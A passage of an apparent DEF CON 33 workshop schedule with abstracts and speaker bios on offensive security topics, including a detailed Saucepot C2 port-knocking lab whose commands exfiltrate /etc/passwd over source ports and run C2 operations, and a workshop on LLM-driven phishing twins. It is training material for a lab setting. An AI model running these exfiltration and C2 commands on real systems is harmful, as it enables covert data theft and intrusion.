In this workshop, attendees will learn how to attack Kubernetes clusters by simulating a real-world adversary exploiting one of the most recent vulnerabilities in the ecosystem: IngressNightmare (CVE-2025-1974). Participants will practice exfiltrating service account tokens and credentials, performing lateral movement, escalating privileges by targeting common applications deployed in Kubernetes environments, and ultimately compromising the entire cluster.


People:
    SpeakerBio:  Lenin Alevski, Security Engineer at Google

Lenin Alevski is a Full Stack Engineer and generalist with a lot of passion for Information Security. He currently works as a Security Engineer at Google. Lenin specializes in building and maintaining Distributed Systems, Application Security and Cloud Security in general. Lenin loves playing CTFs, contributing to open source, and writing about security and privacy on his personal blog https://www.alevsk.com.




Redteam Infrastructure Vibez Edition

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)-RTV Track 2
When:  Saturday, Aug 9, 15:00 – 16:50 PDT

Creator: Red Team Village

In this session we will showcase how you can leverage AI to build your terraform packages for your Red Team Workshop. Make sure to bring your laptops!


People:
    SpeakerBio:  Moses Frost

Moses Frost has been working in the field since the late 90’s, having worked with computers in the late 80s for fun and moved into a more professional field shortly after high school. He is a Red Team Operator at Neuvik and a senior instructor and course author at the SANS Institute, authoring and teaching the Cloud Penetration Testing Course. He also co-authors the book Gray Hat Hacking: Volume 6. He has worked at many companies, notably Cisco Systems, McAfee, and TLO. Currently, he is a Senior Operator at Neuvik. Over those years, he has enjoyed working in all parts of the IT Industry and hopes to do so for many more years.




Reverse Engineering Modern Websites – Practical Decomposition for Security Analysis

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 2-604 (AppSec Village)-Classroom
When:  Saturday, Aug 9, 15:30 – 17:45 PDT

Creator: AppSec Village

In this 2.5-hour hands-on workshop, participants will delve into the art of reverse engineering web applications to uncover hidden security flaws. Through guided exercises, attendees will learn to deconstruct application architectures and infrastructures, gaining insights into vulnerabilities, misconfigurations, and ways to make exploitation more reliable. Whether you’re hunting for logic flaws, mapping unknown attack surfaces, or trying to make sense of a black-box app, this workshop equips you with practical strategies and mental models you can apply immediately.

The workshop includes guided mini-lessons, worksheets to reinforce key patterns, and a hands-on lab hosted remotely (or locally) where attendees apply their skills in real time. Support will be available throughout, and all materials (labs, notes, and tool recommendations) will be provided for continued practice after the session.


People:
    SpeakerBio:  Abraham De Leon Gutierrez

Hey, I’m Abraham. I’m from Mexico, currently finishing my degree in cybersecurity engineering and working as a penetration testing intern. What I like the most about cybersecurity is the community, always willing to share knowledge and help each other. I’m passionate about learning new things like music, hacking, tech, videogames and philosophy. I also enjoy meeting new people, taking on challenges like CTFs and sharing my knowledge with others.

SpeakerBio:  kuzushi

Andrew Wilson (aka “kuzushi”) is a seasoned application security expert, software architect, and international community builder with nearly two decades of experience across both offensive and defensive security.

Recognized as a Microsoft MVP in Azure and Developer Security from 2010–2015, Andrew has built and secured enterprise-scale systems, led one of the largest offensive security teams in the U.S., and personally conducted over 140+ web and application assessments.

Currently, Andrew is pursuing a PhD in offensive cybersecurity and AI, focusing on how mental models and context shape modern security analysis. He’s also an independent researcher, mentor, and frequent conference speaker, with past talks at defcon, ToorCon, AppSecDC, LASCON, and multiple BSides events nationwide.




RLA Demo and Workshop

Creator Talk Map Page – LVCC West-Level 2-W222-W223 (Voting Village Talks ) W222
When:  Friday, Aug 8, 17:00 – 17:59 PDT

Creator: Voting Village

A hands-on workshop on conducting Risk Limiting Audits, putting into practice the principles discussed in Philip Stark’s 4pm talk.


People:
    SpeakerBio:  Philip Stark, University of California at Berkeley

Philip B. Stark is Distinguished Professor of Statistics at the University of California, Berkeley, where he has served as department chair and associate dean. In 2007 he invented “risk-limiting audits” (“RLAs”), endorsed by the National Academies of Science, Engineering, and Medicine and the American Statistical Association, among others, and required or authorized by law in about 15 states. He designed and helped conduct the first dozen pilot RLAs, helped draft RLA legislation for several states, and has published open-source software to support RLAs. In 2012, he and David Wagner introduced “evidence-based elections,” a paradigm for conducting demonstrably trustworthy elections. Stark has served on the Board of Advisors of the US Election Assistance Commission and its cybersecurity subcommittee, the Board of Directors of Verified Voting Foundation and the Election Integrity Foundation, and on the California Post Election Audit Standards Working Group. He has worked with the Secretaries of State of California, Colorado, and New Hampshire and numerous local election officials. Stark has testified about election integrity in state and federal courts and to legislators. He received the IEEE Cybersecurity Award for Practice, the UC Berkeley Chancellor’s Award for Research in the Public Interest, and the John Gideon Award for Election Integrity. He is a fellow of the American Statistical Association and the Institute of Physics and a member of the American Academy of Arts and Sciences.




Secure Compute Module and Microcontroller Workshop

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-401 (Embedded Systems Village)
When:  Saturday, Aug 9, 10:00 – 17:59 PDT
Friday, Aug 8, 10:00 – 17:59 PDT
Sunday, Aug 10, 10:00 – 11:59 PDT

Creator: Embedded Systems Village

Come learn about and try our Micropython and microcontroller workshop, and learn about the secure boot tools for compute modules.




Self Custodial Wallet Use

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 4-Communities-C101 (Cryptocurrency Community)
When:  Sunday, Aug 10, 10:00 – 11:50 PDT

Creator: Cryptocurrency Community

The workshop will begin with a brief presentation about cryptocurrency, exchanges, hardware wallets, hot wallets, cold wallets, and other introductory information needed to begin cryptocurrency transactions. Participants will be given a sample wallet for practice purposes only. Participants will be guided through the opening of a wallet, with a detailed discussion on public and private keys, the different types of wallets available for self custody, and the different security features of wallets. The discussion will delve into hot security topics, including the importance of randomized seeds, and consider a couple of case scenarios where wallets have been hacked due to a lack of security, followed by a discussion on how to prevent these types of security defects. Next, participants will create a hot and a cold wallet, each with a twelve-word seed. After completing setup of the cold wallet, participants will be required to simulate a lost/stolen/destroyed wallet, wipe the wallet, and set it up again.


People:
    SpeakerBio:  HalFinneyIsMyHomeBoy
No BIO available



SIMjitsu: Art of Silent Exploits

Creator Talk Map Page – LVCC West-Level 2-W224 (Telecom Village)
When:  Friday, Aug 8, 14:30 – 15:59 PDT

Creator: Telecom Village

  • Decode the Signal: Breaking Down the PDU Format. Learn how to dissect the raw PDUs used in SMS-based communication.
  • Weaponize the Message: Crafting Custom PDU Payloads. Dive into the dark arts of crafting malicious SMS payloads.
  • Hunt the Signal: Detecting SIMjacker Through Forensic PDU Analysis. Learn to identify signs of SIMjacker attacks in PDU traffic.
  • Own the Location: Deploying a SIM-Based Tracker Applet. Step-by-step build and test of a location tracking applet that abuses SIM capabilities for silent positioning.

People:
    SpeakerBio:  Zibran Sayyed
No BIO available



Stealing Browser Cookies: Bypassing the newest Chrome security measures

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)-RTV Track 3
When:  Friday, Aug 8, 12:00 – 12:50 PDT

Creator: Red Team Village

NOTE: There is an accompanying tactic that goes along with this workshop which will begin after the workshop completes.

This session explores advanced security mechanisms implemented by major browsers to prevent cookie theft from their storage databases. Chrome has recently implemented AppBound encryption, which provides multi-layered protection for session cookies:

1) A 2-way DPAPI encryption system that operates with both elevated NT AUTHORITY\SYSTEM permissions and normal user-level decryption capabilities;

2) A state-key encryption layer utilizing the ChaCha20Poly1305 algorithm with custom keys (that once was AES-256-GCM encrypted).

These implementations have significantly reduced the effectiveness of info-stealing malware. However, this session will demonstrate potential vulnerabilities in these security measures and explain how to obtain decrypted cookies despite these protections. We will examine the new format specifications and encryption methodologies for cookies.

Beyond Chromium-based browsers, we’ll explore Gecko’s encryption algorithms, which involve structured ASN.1 data formats with multiple encryption schemes including 3DES and AES-256. We’ll also analyze Chromium on macOS which relies on PBKDF2 key derivation, and WebKit-based browsers that store cookies in binary cookie files.

Additionally, we’ll discuss Chrome’s forthcoming “Device Bound Session Cookies” (DBSC) technology, which aims to further mitigate session hijacking through cookie theft by implementing TPM chip-based encryption and requiring proof of possession of the cryptographic key.


People:
    SpeakerBio:  Rafael Felix

Rafael has been working with malware development for 4 years, also being involved in the malware community for more than 6 years. He is also experienced in Incident and Response, specifically during malware inner workings analysis. Currently, Rafael is a researcher for Hakai Offensive Security, being deeply involved with red-team operations.




StealthToken: Exploiting Identity Providers the Serverless Way

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)-RTV Track 2
When:  Saturday, Aug 9, 13:00 – 14:50 PDT

Creator: Red Team Village
Introduction :

The workshop revolves around phishing techniques to capture yummy cookies & refresh tokens against highly targeted Identity Providers. Instead of using server based infrastructure, we will use server-less infra to launch stealth attacks rotating trusted implicit domains & integration directly with the productivity apps like slack, teams etc.

The flow of the workshop :

  • OAuth2 background & research
  • Tokens & their privileges
    • Family of Client IDs (FOCI)
  • Spinning server-less infra for advanced phishing
    • Terraform
    • Pulumi
  • Capturing honey:
    • Cookies
    • Tokens
  • Replaying tokens
    • To access other resources
  • Preventive Measures & Detection

Workshop Duration: 120 Minutes


People:
    SpeakerBio:  Manish Gupta

Manish Gupta is Director of CyberWarFare Labs, with 7.5+ years of expertise in offensive information security, where he specializes in red teaming activities in enterprise environments. His research interests include real-world cyber attack simulation and advanced persistent threats (APT). Previously he has presented his research at reputed conferences like Blackhat USA, DEFCON, Nullcon, BSIDES Chapters, X33fcon, NorthSec, and other corporate trainings.

SpeakerBio:  Yash Bharadwaj

Yash Bharadwaj is a seasoned technologist with over 7.5 years of experience, currently serving as the Technical Director & Head of R&D at CyberWarfare Labs. Passionate about offensive security, he specializes in uncovering and analyzing emerging TTPs, building Red/Blue team infrastructure and simulating Identity Based Attacks. A sought-after speaker, he has conducted hands-on training & delivered talks at prestigious conferences such as BlackHat (USA, Asia, EU), Nullcon, X33fCon, NorthSec, and various BSides chapters. A recognized thought leader, he combines technical depth with business-aligned security leadership.




Surfing through the Stream: Advanced HTTP Desync exploitation in the wild

Creator Talk Map Page – LVCC West-Level 3-W326 (Bug Bounty Village)
When:  Saturday, Aug 9, 13:00 – 14:30 PDT

Creator: Bug Bounty Village

Modern websites have evolved into complex, layered network architectures—creating fertile ground for serious protocol-level vulnerabilities that traditional tools often overlook. As web applications continue growing in complexity, critical vulnerabilities such as HTTP smuggling, first-request routing, and cache poisoning/deception become increasingly prevalent, underscoring the need for tooling that treats HTTP as it truly is: a stream-based protocol.

Although security professionals commonly rely on HTTP proxies to intercept, analyze, and manipulate traffic, most current solutions obscure the stream-oriented nature of the protocol. By presenting HTTP interactions merely as isolated request-response transactions, crucial details—like persistent connections, pipelining, and geo-routing—are concealed, making it difficult to fully comprehend data flows or uncover advanced attack vectors.

In this session, I’ll present a new Burp extension to dive deep into the raw streams powering HTTP, turning overlooked details into powerful exploits. You’ll learn how to spot hidden proxies, exploit subtle errors to desynchronize connections, hijack requests, and uncover vulnerabilities that evade traditional tools. Through real-world case studies, I’ll reveal exactly how you can chain advanced HTTP Desync attacks to secure bounties that others have left behind—transforming complex network architectures into your own bug bounty playground!


People:
    SpeakerBio:  Martin “tincho_508” Doyhenard, Security Researcher at PortSwigger

Martin is a Security Researcher at PortSwigger with over 10 years of experience specializing in web security and reverse engineering. He is renowned for presenting multiple pieces of groundbreaking research at premier conferences like Black Hat, DEFCON and RSA. He is an active participant in Capture The Flag (CTF) competitions and bug bounty programs, consistently uncovering critical vulnerabilities and driving innovation in cybersecurity.




Taiwan Digital Blockade Lite: Wargame

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 2-504 (Maritime Hacking Village)-Workshop Area
When:  Saturday, Aug 9, 11:00 – 11:59 PDT
Saturday, Aug 9, 16:30 – 17:30 PDT
Friday, Aug 8, 11:00 – 11:59 PDT

Creator: Maritime Hacking Village

🛰️⚡ Can you keep Taiwan connected?

Come play Taiwan Digital Blockade Lite at the Maritime Hacking Village @ DEF CON 33 — a fast-paced attacker-defender wargame adapted from a US Naval War College scenario.

🎲 In a 25-30 minute dice game, you’ll face off over Taiwan’s vulnerable critical infrastructure: communications cables, power grids, satellite links.

One side launches cyberattacks, sabotage, and electronic warfare to shut it all down. The other scrambles to keep the lights and the data on.

Whether you are a seasoned ICS practitioner, or a complete noob, the game is fun, fast, and thought provoking.


People:
    SpeakerBio:  Jason Vogt, USNWC

Jason Vogt is an assistant professor in the Strategic and Operational Research Department, Center for Naval Warfare Studies at the United States Naval War College. Professor Vogt is a cyber warfare and wargaming expert. He has participated in the development of multiple wargames at the United States Naval War College. He previously served on active duty as an Army officer.




Tales from the NIST AI Pen Test Challenge – AI Pen Testing 101

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)-RTV Track 4
When:  Saturday, Aug 9, 16:00 – 16:50 PDT

Creator: Red Team Village

Attendees will get hands-on with some AI pen testing techniques based on the instructor’s experiences from the NIST AI Pen Test Framework Challenge and industry best practices.


People:
    SpeakerBio:  Lee McWhorter

Lee McWhorter, Owner & Chief Geek at McWhorter Technologies, has been involved in IT since his early days and has over 30 years of experience. He is a highly sought after professional who first learned about identifying weaknesses in computer networks, systems, and software when Internet access was achieved using a modem. Lee holds an MBA and more than 20 industry certifications in such areas as System Admin, Networking, Programming, Linux, IoT, and Cybersecurity. His roles have ranged from the server room to the board room, and he has taught for numerous universities, commercial trainers, and nonprofits. Lee works closely with the Dark Arts Village at RSAC, Red Team Village at DEFCON, Texas Cyber Summit, CompTIA, and the CompTIA Instructor Network as a Speaker, SME, and Instructor.




Testing Environment Setup and Local Storage Enumeration

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 4-Communities-C106 (Mobile Hacking Community)
When:  Friday, Aug 8, 10:15 – 11:15 PDT

Creator: Mobile Hacking Community

This session will walk you through setting up a mobile testing environment and extracting APKs from installed apps. You’ll also explore how to locate and analyze sensitive data stored locally, including shared preferences, databases, and more.


People:
    SpeakerBio:  Grigoris Papoutsis, Senior Training Developer at Hack The Box

Grigoris is a Senior Training Developer at Hack The Box. He is passionate about Mobile Security and creating innovative content for cybersecurity Training. In addition to his role, Grigoris also teaches Mobile Application Security at the University of Piraeus. He graduated with an M.Sc. degree in Digital Systems Security, and he holds a B.Sc. in Computer Science with a specialization in Software Development. Grigoris has previously worked as a Penetration Tester, and he has been one of the founders and a core member of the cybersecurity research group INSSec at the University of West Attica since 2019.




Using Evil Human Digital Twins for Fun and Profit

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 2-702 (Adversary Village)-Workshop Area
When:  Saturday, Aug 9, 13:00 – 14:59 PDT

Creator: Adversary Village

Twenty‑four months ago we presented the Black Hat talk “Evil Digital Twin” in which we demonstrated how large language models (LLMs) could readily exploit the cognitive vulnerabilities of users, and that humans would perceive AI as sentient long before true artificial general intelligence emerges. Join us for this two‑hour workshop as we walk you through the basic architecture of human digital twins (HDTs) and how HDTs, trained on the core patterns of human individuals, may be deployed either to simulate the targets of social engineering attacks or to operate as high-fidelity honey pots. We also explore a coming future of persistent cognitive cyber‑warfare, escalating as the cost of deception approaches zero and the attack surface shifts from networks to minds. Audience members will interact with SCOTOBOT (a human digital twin of a Supreme Court Justice), meet a perfect AI assistant for insider threat, and leave with a NIST research‑based LLM that speaks in phishing emails.

Links:
    https://adversaryvillage.org/adversary-events/DEFCON-33/Matthew-Canham/

People:
    SpeakerBio:  Matthew Canham, Executive Director at Cognitive Security Institute

Dr. Matthew Canham is the Executive Director of the Cognitive Security Institute and a former Supervisory Special Agent with the Federal Bureau of Investigation (FBI). He has a combined twenty-one years of experience in conducting research in cognitive security and human-technology integration. He currently holds an affiliated faculty appointment with George Mason University, where his research focuses on the cognitive factors in synthetic media social engineering and online influence campaigns. He was previously a research professor with the University of Central Florida, School of Modeling, Simulation, and Training’s Behavioral Cybersecurity program.

His work has been funded by NIST (National Institute of Standards and Technology), DARPA (Defense Advanced Research Projects Agency), and the US Army Research Institute. He has provided cognitive security awareness training to the NASA Kennedy Space Center, DARPA, MIT, US Army DevCom, the NATO Cognitive Warfare Working Group, the Voting and Misinformation Villages at DefCon, and the Black Hat USA security conference. He holds a PhD in Cognition, Perception, and Cognitive Neuroscience from the University of California, Santa Barbara, and SANS certifications in mobile device analysis (GMOB), security auditing of wireless networks (GAWN), digital forensic examination (GCFE), and GIAC Security Essentials (GSEC).




Voting Systems Lab

Creator Talk Map Page – LVCC West-Level 2-W222-W223 (Voting Village Lab) W223
When:  Saturday, Aug 9, 10:00 – 17:59 PDT
Friday, Aug 8, 10:00 – 17:59 PDT
Sunday, Aug 10, 10:00 – 11:59 PDT

Creator: Voting Village

Hands-on access to real voting systems




Weaponizing Kestrel: Red Team Tradecraft for Hunting

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)-RTV Track 2
When:  Friday, Aug 8, 13:00 – 13:50 PDT

Creator: Red Team Village

This workshop explores how Kestrel can be innovatively used for hunting advanced threats in critical infrastructures using offensive security methodologies. It delves into techniques and strategies that simulate real-world adversary attacks while also identifying vulnerabilities and anomalous behaviors with offensive techniques before they are exploited in a real scenario. The workshop will perform controlled and simulated attacks, such as network intrusion, data exfiltration, and persistence, to generate artifacts that will serve as the foundation for active threat hunting. We will configure and calibrate Kestrel to identify anomalous patterns within network traffic and system interactions, correlating these patterns with MITRE ATT&CK tactics.

This workshop will innovate on the methodology for integrating the Kestrel tool into a threat hunting process with offensive techniques, providing new ways of thinking about advanced threat detection and proactive security.


People:
    SpeakerBio:  Daniel Benavides

Daniel Benavides (age 27) is an experienced cybersecurity professional with more than 7 years of experience in the sector. For four and a half years, he worked as a Systems Administrator (SysAdmin) for the government of El Salvador, where he was responsible for the management and security of critical infrastructure and government systems. Subsequently, for 3 years, he served as Supervisor of a Security Operations Center (SOC) at RSM US LLP, a prominent North American consulting firm, where he led teams in security monitoring, detection, and incident response.

Currently, Daniel holds the role of Senior XDR Consultant at Palo Alto Networks, where he applies his experience in the implementation and optimization of advanced extended detection and response (XDR) solutions. His work focuses on incident response, threat hunting, advanced threat analysis, and the creation of detection rules based on cyber intelligence, helping to strengthen the security of his clients.

His academic background includes a degree in Systems Engineering from Universidad Don Bosco in El Salvador and a Diploma in Cyber Intelligence obtained in Spain, which complement his technical and strategic knowledge. In addition, Daniel holds a series of professional certifications that attest to his expertise in the field: CompTIA Security+, CompTIA CySA+, and the AWS CLF-C02 cloud certification, as well as XDR-specific certifications from Stellar Cyber and Palo Alto Cortex.

Outside of work, Daniel is passionate about Brazilian Jiu Jitsu, in which he holds a blue belt, and actively participates in Capture The Flag (CTF) competitions, demonstrating his skill at solving security challenges. He also devotes time to exploring the TryHackMe cybersecurity platform, where he continues to hone his skills and knowledge. He also loves traveling the world, which allows him to explore new cultures and perspectives.

His combined professional experience, advanced technical skills, academic training, and varied interests position him as a well-rounded expert in cybersecurity, with a solid track record in protecting systems and managing security operations.

SpeakerBio:  Ronald González

Ronald González is an Offensive Security Investigator, Threat Hunter, and Incident Response, Digital Forensics, and SecDevOps professional with more than 10 years of experience in computer systems. He has been a Government Forensic Expert specializing in computer crime scenes, and now works as an individual. He is a national and international consultant helping organizations find vulnerabilities. Ronald holds a few recognized certifications, including CPTS from HackTheBox, GoogleSecOps, and CHFI. He is the leader of the group DEF CON DC11503, HackTheBox El Salvador and BSides El Salvador, and a speaker at DEFCON Red Team Village 32, TEDx, and many other conferences as well.




Whispers Through the Firewall: Data Exfiltration and C2 with Port Knocking

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)-RTV Track 4
When:  Saturday, Aug 9, 11:00 – 11:50 PDT

Creator: Red Team Village

Port knocking is a stealthy network authentication technique (T1205.001) in which a client sends a specific sequence of connection attempts (or “knocks”) to closed ports on a server. When the correct sequence is received, the server dynamically opens a port or triggers an action, enabling concealed access or communication. Saucepot C2 elevates the port knocking technique to a new level. Instead of using destination ports (DstPorts) in TCP sessions as knock sequences, it leverages source ports (SrcPorts), also known as ephemeral ports. This approach allows data exfiltration even in highly restrictive firewall environments where only a single outbound port, such as port 443, is allowed.

In this workshop, attendees will use Saucepot C2 in conjunction with the following MITRE ATT&CK techniques to conduct specific Red Team activities:

| Technique ID | Technique Name | Tactic |
|---|---|---|
| T1041 | Exfiltration Over C2 Channel | Exfiltration |
| T1071.001 | Application Layer Protocol: Web | Command and Control |
| T1205.001 | Traffic Signaling: Port Knocking | Command and Control / Defense Evasion |

Saucepot C2 has been open-sourced at https://github.com/netskopeoss/saucepot. Supported commands or features in Saucepot C2 include:

  • Check-in / heartbeat
  • Directory listing
  • Process listing
  • File upload

Hardware requirements

  • One AWS EC2 t3.micro (or equivalent) VPC instance with at least 1 GB of RAM and 8 GB of storage to serve as the server
  • One AWS EC2 t3.micro (or equivalent) VPC instance (easier option), or a laptop (more difficult option), to serve as the client

Software requirements

Server:

```
sudo apt install net-tools knockd nginx python3-pip python3-scapy
git clone https://github.com/netskopeoss/saucepot
echo "v2025.8" | sudo tee /var/www/html/chk-version
```

Client:

```
sudo apt install net-tools python3-tqdm python3-psutil python3-pycurl
git clone https://github.com/netskopeoss/saucepot
```

Workshop details

  • Exercise 1: Traditional port knocking

    Reveal a web server running on port 80 using the port knocking technique. Once the correct knock sequence is provided, the firewall will be temporarily lifted for that specific client.

Server: Hide the web server until the correct knock sequences (4100, 4200, 4500) have been provided.

```
sudo iptables -I INPUT -p tcp --dport 80 -j REJECT
sudo systemctl start nginx
```

Add the following section to /etc/knockd.conf:

```
[OpenCloseSecretWeb]
    sequence      = 4100,4200,4500
    seq_timeout   = 30
    tcpflags      = syn
    start_command = /usr/sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
    cmd_timeout   = 7200
    stop_command  = /usr/sbin/iptables -D INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
```

If the default interface is not eth0, add Interface = InterfaceName to the [options] section.

Restart knockd:

```
sudo systemctl restart knockd
```

Client:

The protected web service should be unreachable by default.

curl http://server_public_ip

Provide the correct knock sequences; the protected web service should now be reachable.

```
for f in 4100 4200 4500; do nc -w2 server_public_ip $f; done
curl http://server_public_ip
```

  • Exercise 2: Ephemeral port checker

    Check whether you’re in a friendly environment where the client’s source port is preserved after NAT, a crucial requirement for ephemeral port abuse to work. If the laptop’s network environment fails the test, an additional VPC instance will be needed to act as the client.

    Server:

    ```
    sudo systemctl stop nginx
    sudo python3 saucepot-server.py -c -p 80
    ```

    Client:

    ```
    python3 saucepot-client.py -c -d server_public_ip -p 80

    Test 1 with ephemeral port 63034: PASS
    Test 2 with ephemeral port 51151: PASS
    Test 3 with ephemeral port 54321: PASS

    Ephemeral port test succeeded. Enjoy Port Knocking 2.0 technique!
    ```

  • Exercise 3: Data exfiltration

    Exfiltrate a specified file to the server without establishing persistent TCP connections. The connection state is managed through different port-knocking sequences, such as session-start and session-end. The data to be exfiltrated is transmitted via the source port (SrcPort) field of TCP packets within a designated port range.

    Server:

    ```
    sudo python3 saucepot-server.py -d 172.31.253.199 -p 80
    ```

    Client: Exfiltrate /etc/passwd to the server

    ```
    python3 saucepot-client.py -d server_public_ip -p 80 --upload /etc/passwd
    ```

  • Exercise 4: Command-and-control operations

    To achieve bidirectional communication, the Last-Modified header in HTTP responses is used to deliver C2 commands to the client. Saucepot C2 currently supports a few simple commands, such as ls, ps, and others.

    Server:

    ```
    sudo systemctl start nginx
    sudo python3 saucepot-server.py -d 172.31.253.199 -p 80
    ```

    Client:

    ```
    python3 saucepot-client.py -d server_public_ip -p 80
    ```

  • Exercise 5: Observation of anomalies at L4 and L7

    Observe the anomalies at L4 and L7.

    On the server, in two separate windows:

    Web access log:

    ```
    tail -F /var/log/nginx/access.log
    ```

    SYN packets:

    ```
    sudo tcpdump -i enX0 -n 'tcp[tcpflags] & tcp-syn != 0'
    ```

This workshop has been verified on Ubuntu 24.04 LTS
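
The server-side check that Exercise 1 configures in /etc/knockd.conf can be modelled as a small per-client state machine. This is an added example, not code from the workshop or from knockd: it uses the page's sequence, seq_timeout and cmd_timeout values over constructed SYN events, and the KnockGate class, the replay function and the handling of unexpected ports are assumptions of this simplified model.

```python
# Added example: simplified model of a knock-sequence gate, not knockd's source.
SEQUENCE = (4100, 4200, 4500)  # sequence from the page's knockd.conf section
SEQ_TIMEOUT = 30               # seq_timeout: seconds to complete the sequence
CMD_TIMEOUT = 7200             # cmd_timeout: seconds until stop_command runs


class KnockGate:
    def __init__(self):
        self.progress = {}  # client IP -> (knocks matched so far, time of first knock)
        self.allowed = {}   # client IP -> time at which the ACCEPT rule is removed

    def on_syn(self, ts, ip, dport):
        """Feed one inbound SYN; return True if it completes the sequence."""
        idx, started = self.progress.pop(ip, (0, ts))
        if idx and ts - started > SEQ_TIMEOUT:
            idx, started = 0, ts           # too slow: earlier knocks are discarded
        if dport == SEQUENCE[idx]:
            idx += 1                       # expected next port
        elif dport == SEQUENCE[0]:
            idx, started = 1, ts           # unexpected, but restarts the sequence
        else:
            idx = 0                        # unexpected port: progress is lost
        if idx == len(SEQUENCE):
            self.allowed[ip] = ts + CMD_TIMEOUT  # point where start_command runs
            return True
        if idx:
            self.progress[ip] = (idx, started)
        return False

    def is_open(self, ts, ip):
        """Would port 80 accept this client at time ts?"""
        return ts < self.allowed.get(ip, 0)


# Constructed SYN events: (seconds, client IP, destination port).
EVENTS = [
    (0, "198.51.100.10", 4100), (1, "198.51.100.10", 4200), (2, "198.51.100.10", 4500),
    (5, "198.51.100.20", 4100), (6, "198.51.100.20", 4500), (7, "198.51.100.20", 4200),
    (10, "198.51.100.30", 4100), (20, "198.51.100.30", 4200), (55, "198.51.100.30", 4500),
]


def replay(events):
    """Replay events through a fresh gate; return (clients that opened it, gate)."""
    gate = KnockGate()
    opened = [ip for ts, ip, dport in events if gate.on_syn(ts, ip, dport)]
    return opened, gate


if __name__ == "__main__":
    opened, gate = replay(EVENTS)
    print("opened for:", opened)
    print("still open after cmd_timeout:", gate.is_open(2 + CMD_TIMEOUT, opened[0]))
```

Of the three constructed clients, only the one that knocks in order and within seq_timeout opens the gate; the out-of-order and too-slow clients stay blocked.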

Troubleshoot Guide:

  • Python packages required
  • VPC instance’s inbound firewall to allow 80/tcp and those used in traditional port-knock sequences
  • Use VPC instance NIC’s private IP address in exercise 3 & 4 for the -d ip arg on Server

People:
    SpeakerBio:  Hubert Lin

Hubert Lin is an offensive security expert specializing in remote vulnerability exploitation, honeypots, and penetration testing. He previously led a signature team for network threat defense and served as a senior staff engineer on a Red Team, where he evaluated network intrusion prevention systems and conducted sanctioned red team exercises to strengthen corporate security. Hubert holds certifications as a Red Hat Certified Engineer (RHCE) and an Offensive Security Certified Professional (OSCP). Currently, he works at Netskope as a Principal Researcher and has talked at DEFCON Cloud Village, RSAC, BSidesLV, BSidesSG, Australian CyberCon, GovWare, and CYBERSEC in the past few years.